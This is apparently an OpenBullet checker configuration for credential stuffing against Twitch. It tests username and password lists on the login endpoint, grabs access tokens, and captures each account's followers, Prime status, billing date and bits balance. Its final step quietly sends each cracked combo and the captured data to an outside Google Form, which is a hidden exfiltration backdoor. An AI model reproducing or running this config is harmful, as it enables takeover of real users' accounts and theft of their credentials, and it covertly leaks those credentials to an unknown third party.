[SETTINGS]
{
  "Name": "TwitchCapture",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2019-05-19T00:05:31.9132367+02:00",
  "AdditionalInfo": "",
  "Author": "Edit",
  "Version": "1.2.3.9 [Paradox Mod]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#Login REQUEST POST "https://passport.twitch.tv/login" 
  CONTENT "{\"username\":\"<USER>\",\"password\":\"<PASS>\",\"client_id\":\"kimne78kx3ncx6brgo4mv6wki5h1ko\"}" 
  CONTENTTYPE "text/plain;charset=UTF-8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "origin: https://www.twitch.tv" 
  HEADER "referer: https://www.twitch.tv/" 

#Cek_Login KEYCHECK 
  KEYCHAIN Success OR 
    KEY "access_token" 
  KEYCHAIN Failure OR 
    KEY "user credentials incorrect" 
    KEY "invalid password" 
    KEY "no account linked to email or phone number" 
    KEY "multiple accounts linked to email" 
  KEYCHAIN Ban OR 
    KEY "captcha incorrect" 

#Token PARSE "<SOURCE>" LR "token\":\"" "\"}" -> VAR "Token" 

#Request_Akun REQUEST GET "https://api.twitch.tv/kraken/channels/<COOKIES(name)>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/vnd.twitchtv.v3+json" 
  HEADER "Referer: https://www.twitch.tv/" 
  HEADER "client-id: jzkbprff40iqj646a697cyrvl0zt2m6" 

#Username PARSE "<SOURCE>" LR "display_name\":\"" "\",\"" -> CAP "Username" 

#Followers PARSE "<SOURCE>" LR "followers\":" ",\"" -> CAP "Followers" 

#Cek_Paket REQUEST POST "https://gql.twitch.tv/gql" 
  CONTENT "[{\"operationName\":\"GDPRConsent\",\"variables\":{},\"extensions\":{\"persistedQuery\":{\"version\":1,\"sha256Hash\":\"6a365b595979152ac69a5449a7d46283f346a9a7f518febe91be05c958b31516\"}}},{\"operationName\":\"Ads_Components_AdManager_User\",\"variables\":{},\"extensions\":{\"persistedQuery\":{\"version\":1,\"sha256Hash\":\"1fd9eeac7ab98004ee00dc6554e88759f1fa66ea94b97487f69b1ddf3a9d215b\"}}},{\"operationName\":\"TopNav_CurrentUser\",\"variables\":{},\"extensions\":{\"persistedQuery\":{\"version\":1,\"sha256Hash\":\"625a9b3015d5956f18a813ecb7619bcbdccd037cdafcb64c31c2f98c009e71b5\"}}},{\"operationName\":\"Algolia_RequestInfo\",\"variables\":{},\"extensions\":{\"persistedQuery\":{\"version\":1,\"sha256Hash\":\"53a624acee2ecd22dd652c6c7beb352e30a62fc91260cf10d4a687cf08c881c0\"}}},{\"operationName\":\"Prime_PrimeOffers_CurrentUser\",\"variables\":{},\"extensions\":{\"persistedQuery\":{\"version\":1,\"sha256Hash\":\"a773b7efefe390d49753520f7db73d03794b008af6acc22c06a2c630d46d5518\"}}},{\"operationName\":\"UserMenuCurrentUser\",\"variables\":{},\"extensions\":{\"persistedQuery\":{\"version\":1,\"sha256Hash\":\"19ac1355592ec5b270d9bea6278511c736b4816140e840944c799c273b40daca\"}}},{\"operationName\":\"SideNav_FeaturedChannels\",\"variables\":{\"language\":\"en\"},\"extensions\":{\"persistedQuery\":{\"version\":1,\"sha256Hash\":\"b64cecdbaf6f4ae14250df0d2d6be0cbf947de89d4a66b833f92bbea66055328\"}}},{\"operationName\":\"FollowedChannels\",\"variables\":{\"limit\":100,\"cursor\":\"\"},\"extensions\":{\"persistedQuery\":{\"version\":1,\"sha256Hash\":\"9bf5a27f4203b2751cb3e91acdca1b1f43272bb38e2a64edce6d7abdd5d8a180\"}}},{\"operationName\":\"RecommendedChannels\",\"variables\":{\"first\":10,\"language\":\"\",\"recID\":\"6c62b0b0-69fc-49db-8684-8878868c36c2\"},\"extensions\":{\"persistedQuery\":{\"version\":1,\"sha256Hash\":\"82a726e59e1aac4ca0338886d67a87898257730f29395605a755d61ed30cadd8\"}}},{\"operationName\":\"OnlineFriends\",\"variables\":{},\"extensions\":{\"persistedQuery\":{\"version\":1,\"sha256Hash\":\"d7598061ae52ce865fe32707715b77124799a3579be18bf20740ab675c09169f\"}}}]" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Referer: https://www.twitch.tv/inventory" 
  HEADER "Authorization: OAuth <Token>" 
  HEADER "client-id: jzkbprff40iqj646a697cyrvl0zt2m6" 

#Cek_Status KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "FREE" OR 
    KEY "hasPrime\":false" 

#Cek_Pembayaran_Selanjutnya REQUEST POST "https://gql.twitch.tv/gql" 
  CONTENT "[{\"operationName\":\"SubscriptionsManagement_SubscriptionBenefits\",\"variables\":{\"limit\":100,\"cursor\":\"\",\"filter\":\"PLATFORM\",\"platform\":\"WEB\"},\"extensions\":{\"persistedQuery\":{\"version\":1,\"sha256Hash\":\"235be81d396cb81679dba12e34dd3993b5c66129c99fed96086f86e9dc49b271\"}}},{\"operationName\":\"SubscriptionsManagement_SubscriptionBenefits\",\"variables\":{\"limit\":100,\"cursor\":\"\",\"filter\":\"GIFT\",\"platform\":\"WEB\"},\"extensions\":{\"persistedQuery\":{\"version\":1,\"sha256Hash\":\"235be81d396cb81679dba12e34dd3993b5c66129c99fed96086f86e9dc49b271\"}}},{\"operationName\":\"SubscriptionsManagement_SubscriptionBenefits\",\"variables\":{\"limit\":100,\"cursor\":\"\",\"filter\":\"PLATFORM\",\"platform\":\"ANDROID\"},\"extensions\":{\"persistedQuery\":{\"version\":1,\"sha256Hash\":\"235be81d396cb81679dba12e34dd3993b5c66129c99fed96086f86e9dc49b271\"}}},{\"operationName\":\"SubscriptionsManagement_SubscriptionBenefits\",\"variables\":{\"limit\":100,\"cursor\":\"\",\"filter\":\"ALL\",\"platform\":\"WEB\"},\"extensions\":{\"persistedQuery\":{\"version\":1,\"sha256Hash\":\"235be81d396cb81679dba12e34dd3993b5c66129c99fed96086f86e9dc49b271\"}}},{\"operationName\":\"SubscriptionsManagement_ExpiredSubscriptions\",\"variables\":{\"limit\":100,\"cursor\":\"\"},\"extensions\":{\"persistedQuery\":{\"version\":1,\"sha256Hash\":\"935778419b9c50c545dd3f1d2a5022813febaea5eb2a3c3c675460f9ac434845\"}}}]" 
  CONTENTTYPE "text/plain;charset=UTF-8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Host: gql.twitch.tv" 
  HEADER "Connection: keep-alive" 
  HEADER "Origin: https://www.twitch.tv" 
  HEADER "Accept-Language: en-US" 
  HEADER "Authorization: OAuth <Token>" 
  HEADER "Client-Id: kimne78kx3ncx6brgo4mv6wki5h1ko" 
  HEADER "X-Device-Id: e761b5c03edbd6ae" 
  HEADER "Referer: https://www.twitch.tv/<COOKIES(name)>" 
  HEADER "Accept-Encoding: gzip, deflate" 

#Cek_Pembayaran_Selanjutnya PARSE "<SOURCE>" LR "\"endsAt\":\"" "T" -> VAR "CekPembayaran" 

#Cek_Pembayaran_Selanjutnya PARSE "<SOURCE>" LR "\"renewalDate\":\"" "T" -> CAP "Next Billing" "<CekPembayaran>" "" 

#Cek_Bits REQUEST POST "https://gql.twitch.tv/gql" 
  CONTENT "[{\"operationName\":\"Inventory_DropsList_CurrentUser\",\"variables\":{\"itemNamesEnabled\":true},\"extensions\":{\"persistedQuery\":{\"version\":1,\"sha256Hash\":\"d51dcf0b488e3e2b4e26bb973ebb985c6b01197371e949a0ed8fecdf5f8cb334\"}}},{\"operationName\":\"Inventory\",\"variables\":{},\"extensions\":{\"persistedQuery\":{\"version\":1,\"sha256Hash\":\"22c44231a1332132801f93866bdf1c985995df85e87e2dec45a24fbb66e9a03c\"}}}]" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Referer: https://www.twitch.tv/inventory" 
  HEADER "Authorization: OAuth <Token>" 
  HEADER "client-id: jzkbprff40iqj646a697cyrvl0zt2m6" 

#Bits PARSE "<SOURCE>" LR "bitsBalance\":" ",\"" -> CAP "Bits" 

#Perbaikan FUNCTION URLEncode "<USER>:<PASS>" -> VAR "Combo" 

#Perbaikan FUNCTION URLEncode "<Next Billing> | Followers : <Followers> | Bits : <Bits>" -> VAR "Capture" 

#Verifikasi REQUEST POST "https://docs.google.com/forms/d/e/1FAIpQLSfegqgNj4vCUUNVPO5U_IQMCiWvBduYZeMe8XOp_sKj5eMBSQ/formResponse" ReadResponseSource=FALSE 
  CONTENT "entry.982804051=Twitch&entry.1660391431=<Combo>&entry.1030631301=<Capture>&fvv=1&draftResponse=%5Bnull%2Cnull%2C%227063740132033711229%22%5D%0D%0A&pageHistory=0&fbzx=7063740132033711229" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "origin: https://docs.google.com" 
  HEADER "referer: https://docs.google.com/forms/d/e/1FAIpQLSfegqgNj4vCUUNVPO5U_IQMCiWvBduYZeMe8XOp_sKj5eMBSQ/viewform?fbzx=7063740132033711229" 
  HEADER "upgrade-insecure-requests: 1" 

